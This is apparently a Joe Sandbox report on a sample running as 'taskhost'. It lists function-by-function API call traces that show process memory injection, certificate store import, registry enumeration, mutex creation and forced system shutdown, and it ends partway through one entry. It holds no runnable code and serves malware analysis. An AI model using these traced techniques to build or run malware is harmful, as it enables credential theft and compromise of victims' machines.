Function 00509009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 005174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00507194,?,?,00000104,.exe,00000000), ref: 005174F4
Part of subcall function 005174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00507194,?,?,00000104), ref: 00517575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0050906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 005090BB

Part of subcall function 00518AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00518B23
Part of subcall function 00518AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00518B4A
Part of subcall function 00518AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00518B94
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00518BC1
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?), ref: 00518BF1
Part of subcall function 00518AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00518C1F
Part of subcall function 00518AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00518C31

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

#, xrefs: 00509093
&, xrefs: 005090A1

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005098B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 005174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00507194,?,?,00000104,.exe,00000000), ref: 005174F4
Part of subcall function 005174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00507194,?,?,00000104), ref: 00517575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0050991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050996B

Part of subcall function 00518AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00518B23
Part of subcall function 00518AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00518B4A
Part of subcall function 00518AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00518B94
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00518BC1
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?), ref: 00518BF1
Part of subcall function 00518AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00518C1F
Part of subcall function 00518AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00518C31

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

#, xrefs: 00509951
&, xrefs: 0050994A

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00517A14, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 00517AB5

Strings

p.R, xrefs: 00517A41
Local\, xrefs: 00517A9A
Global\, xrefs: 00517A91

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005165B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58

APIs

recv.WS2_32(?,?,00000400,00000000), ref: 00516600
#19.WS2_32(?,?,00000000,00000000), ref: 0051661A
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00516657

Strings

<MP, xrefs: 005165B7

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00512828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 005135C6: MultiByteToWideChar.KERNEL32(00512884,00000000,?,00511FF2,?,7718F8FF,00512884,00000000,00000032,?,7718F8FF,00000000), ref: 005135DD

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 005128A1

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00512870, 00512888
SOFTWARE\Microsoft, xrefs: 00512855
.dat, xrefs: 0051289B

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050E0FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0050E108
GetThreadDesktop.USER32(00000000), ref: 0050E10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0050E128

Part of subcall function 0050DD09: TlsAlloc.KERNEL32(00522868,00000000,0000018C,00000000,00000000), ref: 0050DD22
Part of subcall function 0050DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0050DD4A
Part of subcall function 0050DD09: CreateEventW.KERNEL32(00522C30,00000001,00000000,?,84889912,?,00000001), ref: 0050DD74
Part of subcall function 0050DD09: CreateMutexW.KERNEL32(00522C30,00000000,?,18782822,?,00000001), ref: 0050DD97
Part of subcall function 0050DD09: CreateFileMappingW.KERNEL32(00000000,00522C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0050DDC2
Part of subcall function 0050DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0050DDD8
Part of subcall function 0050DD09: GetDC.USER32(00000000), ref: 0050DDF5
Part of subcall function 0050DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0050DE15
Part of subcall function 0050DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0050DE1F
Part of subcall function 0050DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0050DE32
Part of subcall function 0050DD09: ReleaseDC.USER32(00000000,?), ref: 0050DE56
Part of subcall function 0050DD09: CreateMutexW.KERNEL32(00522C30,00000000,?,1898B122,?,00000001,005228B8,?,00000102,005228A4,00522E70,00000010,?,?), ref: 0050DF00
Part of subcall function 0050DD09: GetDC.USER32(00000000), ref: 0050DF15
Part of subcall function 0050DD09: CreateCompatibleDC.GDI32(00000000), ref: 0050DF23
Part of subcall function 0050DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0050DF3A
Part of subcall function 0050DD09: SelectObject.GDI32(00000000,00000000), ref: 0050DF4D
Part of subcall function 0050DD09: ReleaseDC.USER32(00000000,00000001), ref: 0050DF65

Part of subcall function 0050DF74: DeleteObject.GDI32(00000000), ref: 0050DF87
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050DF97
Part of subcall function 0050DF74: TlsFree.KERNEL32(00000000,00000000,00522868,00000000,0050E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0050DFA2
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050DFB0
Part of subcall function 0050DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00522868,00000000,0050E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0050DFBA
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050DFC7
Part of subcall function 0050DF74: SelectObject.GDI32(00000000,00000000), ref: 0050DFE1
Part of subcall function 0050DF74: DeleteObject.GDI32(00000000), ref: 0050DFF2
Part of subcall function 0050DF74: DeleteDC.GDI32(00000000), ref: 0050DFFF
Part of subcall function 0050DF74: CloseHandle.KERNEL32(00000000), ref: 0050E010
Part of subcall function 0050DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0050E01F
Part of subcall function 0050DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0050E038

Strings

N, xrefs: 0050E132

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005187C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 005187D7

Part of subcall function 005146F4: GetTickCount.KERNEL32(00518766,?), ref: 005146F4

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00518829

Strings

tmp, xrefs: 005187ED
%s%08x, xrefs: 005187F2

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050F367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0050F3CC

Part of subcall function 0051D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0051D34A
Part of subcall function 0051D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0051D35D
Part of subcall function 0051D325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0051D39B
Part of subcall function 0051D325: CharToOemW.USER32(?,?), ref: 0051D3B7
Part of subcall function 0051D325: CharToOemW.USER32(?,?), ref: 0051D3C6
Part of subcall function 0051D325: ExitProcess.KERNEL32(00000000), ref: 0051D41C

Part of subcall function 0050E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00504E69,?,?,?,743C152E,00000002), ref: 0050E97F

ExitWindowsEx.USER32(00000014,80000000), ref: 0050F3DF

Part of subcall function 00514A87: GetCurrentThread.KERNEL32(00000020,00000000,0051C9A1,00000000,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514A97
Part of subcall function 00514A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514A9E
Part of subcall function 00514A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0051C9A1,?,?,?,?,0051C9A1,SeTcbPrivilege), ref: 00514AB0
Part of subcall function 00514A87: LookupPrivilegeValueW.ADVAPI32(00000000,0051C9A1,?), ref: 00514AD4
Part of subcall function 00514A87: AdjustTokenPrivileges.ADVAPI32(0051C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00514AE9
Part of subcall function 00514A87: GetLastError.KERNEL32 ref: 00514AF3
Part of subcall function 00514A87: CloseHandle.KERNEL32(0051C9A1), ref: 00514B02

Strings

, xrefs: 0050F383
SeShutdownPrivilege, xrefs: 0050F3AB

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00505ECF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(005225D0), ref: 00505F07
PathRenameExtensionW.SHLWAPI(?,.tmp), ref: 00505F23

Part of subcall function 005189C2: PathSkipRootW.SHLWAPI(?), ref: 005189CD
Part of subcall function 005189C2: GetFileAttributesW.KERNEL32(?,?,00000000,0051D261,?,?,?,?,?), ref: 005189F5
Part of subcall function 005189C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0051D261,?,?,?,?,?), ref: 00518A03

Part of subcall function 00516A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 00516A5B
Part of subcall function 00516A3C: GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 00516A77
Part of subcall function 00516A3C: SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 00516A8E
Part of subcall function 00516A3C: LocalFree.KERNEL32(?), ref: 00516A9D

GetFileAttributesW.KERNEL32(005223C8,005225D0,005225D0,?,?,00506527,00000000,?,00000000,00000330,?,?,00000102), ref: 00505F46

Part of subcall function 00512828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 005128A1

Strings

.tmp, xrefs: 00505F1D

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 005189C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 005189CD
GetFileAttributesW.KERNEL32(?,?,00000000,0051D261,?,?,?,?,?), ref: 005189F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0051D261,?,?,?,?,?), ref: 00518A03

Strings

.exe, xrefs: 005189C9

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00511E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00511E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00511E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00511E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00511E3D, 00511E42, 00511E59

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00514BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00511DBB,00000000,005122ED), ref: 00514BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,00511DBB,00000000,005122ED), ref: 00514BDF

Strings

IsWow64Process, xrefs: 00514BD9
kernel32.dll, xrefs: 00514BCA

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051AAB6, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24

APIs

InternetCloseHandle.WININET(?), ref: 0051AABD

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

EnterCriticalSection.KERNEL32(9), ref: 0051AAD5
LeaveCriticalSection.KERNEL32(9), ref: 0051AAEB

Part of subcall function 00519CD9: CloseHandle.KERNEL32(?), ref: 00519CEC

Strings

9, xrefs: 0051AACF, 0051AAD4, 0051AAEA

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00510AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00510C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00510C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00510CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00510CB5

Part of subcall function 00513346: HeapAlloc.KERNEL32(00000008,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?,?), ref: 00513368
Part of subcall function 00513346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?), ref: 00513379

Part of subcall function 00514660: CryptAcquireContextW.ADVAPI32(00518C87,00000000,00000000,00000001,F0000040,?,00518C87,?,00000030,?,?,?,005191A0,00523EC0), ref: 00514679
Part of subcall function 00514660: CryptCreateHash.ADVAPI32(00518C87,00008003,00000000,00000000,00000030,?,00518C87,?,00000030,?,?,?,005191A0,00523EC0), ref: 00514691
Part of subcall function 00514660: CryptHashData.ADVAPI32(00000030,00000010,00518C87,00000000,?,00518C87), ref: 005146AD
Part of subcall function 00514660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,00518C87), ref: 005146C5
Part of subcall function 00514660: CryptDestroyHash.ADVAPI32(00000030,?,00518C87), ref: 005146DC
Part of subcall function 00514660: CryptReleaseContext.ADVAPI32(00518C87,00000000,?,00518C87,?,00000030,?,?,?,005191A0,00523EC0), ref: 005146E6

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050A088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0050A12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0050A159
RegCloseKey.ADVAPI32(?), ref: 0050A28F

Part of subcall function 005174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00507194,?,?,00000104,.exe,00000000), ref: 005174F4
Part of subcall function 005174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00507194,?,?,00000104), ref: 00517575

Part of subcall function 00517595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00519E26,?,?), ref: 005175AD

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0050A27C

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051B265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0051B28C

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0051B2E0

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0051B343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0051B36F

Part of subcall function 0051B3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0051B437
Part of subcall function 0051B3EC: WriteFile.KERNEL32(0051B3D4,?,00000146,?,00000000), ref: 0051B475
Part of subcall function 0051B3EC: WriteFile.KERNEL32(0051B3D4,?,00000000,?,00000000), ref: 0051B499
Part of subcall function 0051B3EC: FlushFileBuffers.KERNEL32(0051B3D4), ref: 0051B4AD
Part of subcall function 0051B3EC: CloseHandle.KERNEL32(0051B3D4), ref: 0051B4B6

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00517D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(00500000,?), ref: 00517D30
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00517D4E
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00500000,?,?,00000000,?,00000000), ref: 00517DE0

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00500000,?,?,00000000,?,00000000), ref: 00517E05

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00512542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 00517D14: IsBadReadPtr.KERNEL32(00500000,?), ref: 00517D30
Part of subcall function 00517D14: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00517D4E
Part of subcall function 00517D14: WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00500000,?,?,00000000,?,00000000), ref: 00517DE0
Part of subcall function 00517D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00500000,?,?,00000000,?,00000000), ref: 00517E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00512574
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0051316D,?,00000000,?,?,00000000), ref: 005125AB
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0051316D,?,00000000,?,?,00000000), ref: 005125CB

Part of subcall function 00511D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 00511D3B
Part of subcall function 00511D15: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,?,005125E9,00000000,?,?,?,?,0051316D,?), ref: 00511D4F
Part of subcall function 00511D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00511D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0051316D,?,00000000), ref: 0051261A

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(005015B0,00000000,00004401,005015A0,?), ref: 00519874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,005085BE,?,?), ref: 005198C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,005085BE,?,?), ref: 005198D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,005085BE,?,?), ref: 00519909

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00519372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 005186BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 005186D4

Part of subcall function 0051869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 005186B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 005193F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0051940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00519430
FlushFileBuffers.KERNEL32(?), ref: 00519438

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00505B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00505B40

Part of subcall function 00514DCA: CloseHandle.KERNEL32(00000000), ref: 00514DD9
Part of subcall function 00514DCA: CloseHandle.KERNEL32(00000000), ref: 00514DE2

Part of subcall function 00512828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 005128A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00505B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00505BD6
TerminateProcess.KERNEL32(?,00000000), ref: 00505BE3

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00516B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 00516B4A
DispatchMessageW.USER32(?), ref: 00516B55
PeekMessageW.USER32(00000000), ref: 00516B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00516B79

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00514A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00514A3D
Thread32First.KERNEL32(00000000,?), ref: 00514A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 00514A6E
CloseHandle.KERNEL32(00000000), ref: 00514A79

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051ABAE, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 29

APIs

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

EnterCriticalSection.KERNEL32(9), ref: 0051ABC2
LeaveCriticalSection.KERNEL32(9), ref: 0051ABF3

Strings

9, xrefs: 0051ABBC, 0051ABC1, 0051ABF2
nS<SFS, xrefs: 0051ABFC

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 005146F4: GetTickCount.KERNEL32(00518766,?), ref: 005146F4

CharUpperW.USER32(00000000), ref: 0051785B

Strings

.exe, xrefs: 00517745
bcdfghklmnpqrstvwxz, xrefs: 00517759

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051D64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0051D664

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

GetSystemTime.KERNEL32(?), ref: 0051D6B0

Part of subcall function 0051D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0051D581,?,?,00000000), ref: 0051D43F

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Strings

.txt, xrefs: 0051D746

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051A594, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97

APIs

Part of subcall function 005154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00515505
Part of subcall function 005154F1: GetLastError.KERNEL32 ref: 0051550F
Part of subcall function 005154F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0051552F

Part of subcall function 005155A1: HttpQueryInfoA.WININET(?,?,?,?,00000000), ref: 005155BA
Part of subcall function 005155A1: GetLastError.KERNEL32(?,00000000), ref: 005155C0
Part of subcall function 005155A1: HttpQueryInfoA.WININET(?,?,00000000,?,00000000), ref: 005155E2

HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0051A5F4

Part of subcall function 00515547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 0051555D
Part of subcall function 00515547: GetLastError.KERNEL32(?,0051A663,?,0000001C,?,00000000,00000048), ref: 00515567
Part of subcall function 00515547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 00515589

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 00506BD7: RegOpenKeyExW.ADVAPI32(80000001,005227F0,00000000,00000001,?,?), ref: 00506C00

Part of subcall function 00519A9E: RegOpenKeyExW.ADVAPI32(80000001,00523EC0,00000000,00000001,?), ref: 00519ADD

Strings

G, xrefs: 0051A615
nS<SFS, xrefs: 0051A5F4

Memory Dump Source

